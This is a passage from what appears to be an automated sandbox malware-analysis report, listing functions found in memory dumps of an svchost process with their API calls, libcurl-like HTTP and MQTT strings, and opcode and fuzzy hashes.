                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$k
                          • API String ID: 0-2522224428
                          • Opcode ID: 6deba298d6cd6c49c7c3245b1ac95cae2971440002267693c2592f4b961341f3
                          • Instruction ID: 02d1b3218d2795662393898720a0d6c97bbef31d69b05c07c18c064e5c871790
                          • Opcode Fuzzy Hash: 6deba298d6cd6c49c7c3245b1ac95cae2971440002267693c2592f4b961341f3
                          • Instruction Fuzzy Hash: 1CA16D7AB0AB4995EB6A8F15D46032823A1FB46F58F580AB4CE9D077D6DF3CD841D308
                          Function 00007FFDA55B1541 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:
                          • API String ID: 1294909896-1147549499
                          • Opcode ID: b210a9faa6451965c232b38086ed7f33c4090e639266d07f48b4962e36949d2c
                          • Instruction ID: e8be085f19cd671efd887cbfa42a57c8833585d4908b9582a20687fa2b752af8
                          • Opcode Fuzzy Hash: b210a9faa6451965c232b38086ed7f33c4090e639266d07f48b4962e36949d2c
                          • Instruction Fuzzy Hash: 2A418119B0E61A41FE1AEF26A53937A1291AF87FC0F454131E90E07BD7EF2CE4028309
                          Function 00007FFDA55C1760 Relevance: 13.8, APIs: 11, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 0e340849c521c2b7505d7d747180e8081549875e4a4220a0cde0145afa1cd23e
                          • Instruction ID: 0b40b70570ebefc000bf4132c996001ce32c9b2637a478c89a1d138842a8f2b2
                          • Opcode Fuzzy Hash: 0e340849c521c2b7505d7d747180e8081549875e4a4220a0cde0145afa1cd23e
                          • Instruction Fuzzy Hash: D331B73AB4AB84A6E74E9F25EA642A9B374F785F50F480025DB6D03752CF38E474C354
                          Function 00007FFDA55AE560 Relevance: 13.7, APIs: 9, Instructions: 247networksleepCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$Sleep$select
                          • String ID:
                          • API String ID: 2442476585-0
                          • Opcode ID: 0844dcefc245e9baac62046afd1de4330d4d8e678802450620b30691e6808a79
                          • Instruction ID: 7d37fc44148af442d5128b50c0378d28762ec8914c418466bc2a3575b398c31b
                          • Opcode Fuzzy Hash: 0844dcefc245e9baac62046afd1de4330d4d8e678802450620b30691e6808a79
                          • Instruction Fuzzy Hash: 03A1DA2AB0A6CA86EB6B4F16D4283792295FF46F64F104A34DB19577C6DF3ED940C308
                          Function 64945710 Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: EventHandleInformation
                          • String ID:
                          • API String ID: 943243487-0
                          • Opcode ID: 0abebdb6bbe18b6591d2f169ee2d49ccc49482f9618223d758f2abb39a9272bf
                          • Instruction ID: c02d53f5b47e4eab209d974f5deb7cec8a0e804993d913822503880e7c3ff0c7
                          • Opcode Fuzzy Hash: 0abebdb6bbe18b6591d2f169ee2d49ccc49482f9618223d758f2abb39a9272bf
                          • Instruction Fuzzy Hash: 1C41B232682640CAEB55CF75D8003696B65EB86FBCF144225CF2E8B395EF39C145C710
                          Function 649447F0 Relevance: 13.6, APIs: 9, Instructions: 100COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
                          • String ID:
                          • API String ID: 2941551293-0
                          • Opcode ID: 41f481ae3904839b845b6b966e47d7c0d9084ec4171bca2e1ba02052f09d8d33
                          • Instruction ID: 9b255bf73e60d4f51aa72ff79eaf3e3afad282202bf316635f7d93ce8b392ba6
                          • Opcode Fuzzy Hash: 41f481ae3904839b845b6b966e47d7c0d9084ec4171bca2e1ba02052f09d8d33
                          • Instruction Fuzzy Hash: C441B0353D664086FB09DFB0F86036933AAFB85B6CF454525CE0A42794EF39C495CB61
                          Function 00007FFDA55935C7 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$SimpleString::operator=
                          • String ID: %s?%s$Accept-Encoding$Accept-Encoding: %s$POST$Referer$Referer: %s
                          • API String ID: 1621822926-997604947
                          • Opcode ID: 0bd4f664914ea9e259e362c462dbc4fc26b2cf6bed79ad440f1911dc47278712
                          • Instruction ID: 55a9274f9ea94a82eef0cf54563bafaf8ac64d69eee2f891381becbd56646adc
                          • Opcode Fuzzy Hash: 0bd4f664914ea9e259e362c462dbc4fc26b2cf6bed79ad440f1911dc47278712
                          • Instruction Fuzzy Hash: 3F411F7AB0AB8AC4EB53CF65E4243F926A4AB46F84F490035DE4D46396EF3CE454C718
                          Function 00007FFDA55935D0 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$SimpleString::operator=
                          • String ID: %s?%s$Accept-Encoding$Accept-Encoding: %s$PUT$Referer$Referer: %s
                          • API String ID: 1621822926-4091559278
                          • Opcode ID: 06650fabf6b7c7465f164727abdc3be3143b4a5b302dd84c1aaa45273212e9e0
                          • Instruction ID: d9445e052c0c644838c5f98c46fef8a41cb76fa7d2784c68bc4761aba9eab924
                          • Opcode Fuzzy Hash: 06650fabf6b7c7465f164727abdc3be3143b4a5b302dd84c1aaa45273212e9e0
                          • Instruction Fuzzy Hash: B6411E7AB0AB8AC4EB538F65E4243F926A4AB46F84F490035DE4D46396EF3CE454C718
                          Function 64944560 Relevance: 13.6, APIs: 9, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32 ref: 6494457C
                            • Part of subcall function 649444D0: __iob_func.MSVCRT ref: 64944501
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Value__iob_func
                          • String ID:
                          • API String ID: 2820842585-0
                          • Opcode ID: 0546eda2f010a2ff3f3b1f8a39091f3d6a25e4e9caee43d900f00acf19f6acdb
                          • Instruction ID: 16148a25f4b476eea67aa2965a04ab47484b3a23098f2b50d2a6f1ecfa518ab3
                          • Opcode Fuzzy Hash: 0546eda2f010a2ff3f3b1f8a39091f3d6a25e4e9caee43d900f00acf19f6acdb
                          • Instruction Fuzzy Hash: 62316F716916408BFB259F71F80835B77A5F709BA8F140229CEAA477A0DF3DD059CB20
                          Function 00007FFDA5587600 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 260COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _fstat64strchr
                          • String ID: Can't get the size of file.$Content-Length: %lld$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer$ytes
                          • API String ID: 2257945287-3101949335
                          • Opcode ID: afacff5949dba494b15f094d390e0d3cf13b30e035ac943e2aad6cb6084ab8c4
                          • Instruction ID: 513f0cff8f5de9d757c9a790e3ba4f6e5ace7405cf94049dce7e45d8ce7e82bc
                          • Opcode Fuzzy Hash: afacff5949dba494b15f094d390e0d3cf13b30e035ac943e2aad6cb6084ab8c4
                          • Instruction Fuzzy Hash: DEB1D12AB1A68A85FB12CF6598203FD27A1EB46F94F440031DE4D47B96EF3DE941D704
                          Function 00007FFDA55BC800 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLasthtonssend
                          • String ID: Sending data failed (%d)
                          • API String ID: 2027122571-2319402659
                          • Opcode ID: c12e462eca2e6c078f13945e67d4fb94a9b87ce196abfb17e36915c96fb93957
                          • Instruction ID: 27d861c683718b7f4893d4e79c0a0dd929ad06a064c03f13300d7fb6ffef760f
                          • Opcode Fuzzy Hash: c12e462eca2e6c078f13945e67d4fb94a9b87ce196abfb17e36915c96fb93957
                          • Instruction Fuzzy Hash: 4441C237B05A8A80EB029F75E428BA92720F756F99F444532EF5907796DF7CD0458309
                          Function 00007FFDA557C800 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Init2_inflate$Versionzlib
                          • String ID: 1.2.0.4$1.3.1$Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                          • API String ID: 302536580-782595508
                          • Opcode ID: 5e8faf5ed2759c0201d2404577fbf2c9aece4fef74bc6189fcbe6ee69d6734c5
                          • Instruction ID: 8e6ec54ad24276e079b6e52cc9e7ae003515ec36b11970b16cfca9bc64ef4590
                          • Opcode Fuzzy Hash: 5e8faf5ed2759c0201d2404577fbf2c9aece4fef74bc6189fcbe6ee69d6734c5
                          • Instruction Fuzzy Hash: D421C16BB1DA8682E7528F25F4203693760FB46F80F844532DA4E43B57DF2CE485C708
                          Function 64941EA0 Relevance: 12.2, APIs: 8, Instructions: 187synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForMultipleObjects.KERNEL32 ref: 64941EE9
                          • WaitForSingleObject.KERNEL32 ref: 64941F23
                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000070,00007FFDB43BF230,00007FFDB43BFAA0,00000068,?,649421DE,?,?,6494246F), ref: 64941F82
                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000070,00007FFDB43BF230,00007FFDB43BFAA0,00000068,?,649421DE,?,?,6494246F), ref: 6494209A
                          • ResetEvent.KERNEL32 ref: 649420FD
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Wait$ObjectSingle$EventMultipleObjectsReset
                          • String ID:
                          • API String ID: 654736092-0
                          • Opcode ID: 96c9b5ad3ac0c7c7edf09851d5da80622a09f72e97e6fc1457996ee278957ded
                          • Instruction ID: d3ee0eaab07988580939ca2428ce104d4a652107eb983c9cf61b1eb5acf66ab1
                          • Opcode Fuzzy Hash: 96c9b5ad3ac0c7c7edf09851d5da80622a09f72e97e6fc1457996ee278957ded
                          • Instruction Fuzzy Hash: 665114223D440041F7214667E94A3AA0A5FBB577ECF5401A2CF26CA6A1FBBDC5D2C226
                          Function 00007FFDA559B640 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 177stringCOMMON
                          Download Yara Rule
                          APIs
                          • strchr.VCRUNTIME140(?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559B6CC
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559B8E7
                            • Part of subcall function 00007FFDA55949A0: strchr.VCRUNTIME140 ref: 00007FFDA5594A58
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: strchr$free
                          • String ID: %s%s%s:%d$CONNECT$Host$Keep-Alive$Proxy-Connection$User-Agent
                          • API String ID: 3578582447-3503046744
                          • Opcode ID: c7c9ca203e809c69a7538edbe9d9348459ea286da67521505a18d22d4896c789
                          • Instruction ID: 7c868088d1c6cd74550e47d0746ea638d96776a14bbbb2b21dbed0f96bb5ac93
                          • Opcode Fuzzy Hash: c7c9ca203e809c69a7538edbe9d9348459ea286da67521505a18d22d4896c789
                          • Instruction Fuzzy Hash: AE717E6AB0E68AC1FA629F51A4603B927A0FF97F94F444432DA8D47787DF3CE4058348
                          Function 00007FFDA55A3770 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 124COMMON
                          Download Yara Rule
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000002,?,?,00007FFDA55A3249), ref: 00007FFDA55A387A
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000002,?,?,00007FFDA55A3249), ref: 00007FFDA55A390E
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000002,?,?,00007FFDA55A3249), ref: 00007FFDA55A3919
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$malloc
                          • String ID: No MQTT topic found. Forgot to URL encode it?$Too long MQTT topic
                          • API String ID: 2190258309-1276830682
                          • Opcode ID: 1453a0216d4a61804d3a858584b32711943582c8b600f61607bb6e43e0791b2e
                          • Instruction ID: 9441a249f3fa802a396626eb51200e97aa9bc9f0728f773e4bd8c37931d7aefd
                          • Opcode Fuzzy Hash: 1453a0216d4a61804d3a858584b32711943582c8b600f61607bb6e43e0791b2e
                          • Instruction Fuzzy Hash: A041F16AB0A79A82EA029F15F4643B96790EB96FD8F450132EF4D077D7DE2DD506C300
                          Function 64942210 Relevance: 12.1, APIs: 8, Instructions: 97COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 64942170: EnterCriticalSection.KERNEL32(00000120,00000000,00000068,00000000,?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89), ref: 6494219E
                            • Part of subcall function 64942170: LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421B1
                          • TryEnterCriticalSection.KERNEL32 ref: 64942287
                          • LeaveCriticalSection.KERNEL32 ref: 649422C3
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: 64a14b26eebd602a32318612d1c73aaa2676a09661875bd3566d3150fd0f9fc1
                          • Instruction ID: c70b7dd98fa8b30a946d7bfc7cacc3f56c823bbf88279334903176617df7d1a3
                          • Opcode Fuzzy Hash: 64a14b26eebd602a32318612d1c73aaa2676a09661875bd3566d3150fd0f9fc1
                          • Instruction Fuzzy Hash: 17318C2238060486EB149F76E9507DA2365BB86FECF884732CD69973E4DF35C859C351
                          Function 64946FF0 Relevance: 12.1, APIs: 8, Instructions: 88timethreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 64947015
                          • GetThreadTimes.KERNEL32 ref: 64947037
                          • GetCurrentProcess.KERNEL32 ref: 64947080
                          • GetProcessTimes.KERNEL32 ref: 649470A2
                          • _errno.MSVCRT ref: 649470AC
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 649470CC
                          • QueryPerformanceFrequency.KERNEL32 ref: 649470F5
                          • QueryPerformanceCounter.KERNEL32 ref: 64947104
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentPerformanceProcessQueryThreadTimeTimes$CounterFileFrequencySystem_errno
                          • String ID:
                          • API String ID: 3786581644-0
                          • Opcode ID: 1cbd5dd333b386ab46c507ef65a2726135c869851dae07a2f01727df85f622f6
                          • Instruction ID: 1c768bd9e69684d563be0dbbaa5e68889a0c424e9680141303368067254932ee
                          • Opcode Fuzzy Hash: 1cbd5dd333b386ab46c507ef65a2726135c869851dae07a2f01727df85f622f6
                          • Instruction Fuzzy Hash: A2318372755B8883DF09EF61E81036AB366FBD5B88F509126EA9A4B758EF3DC014C740
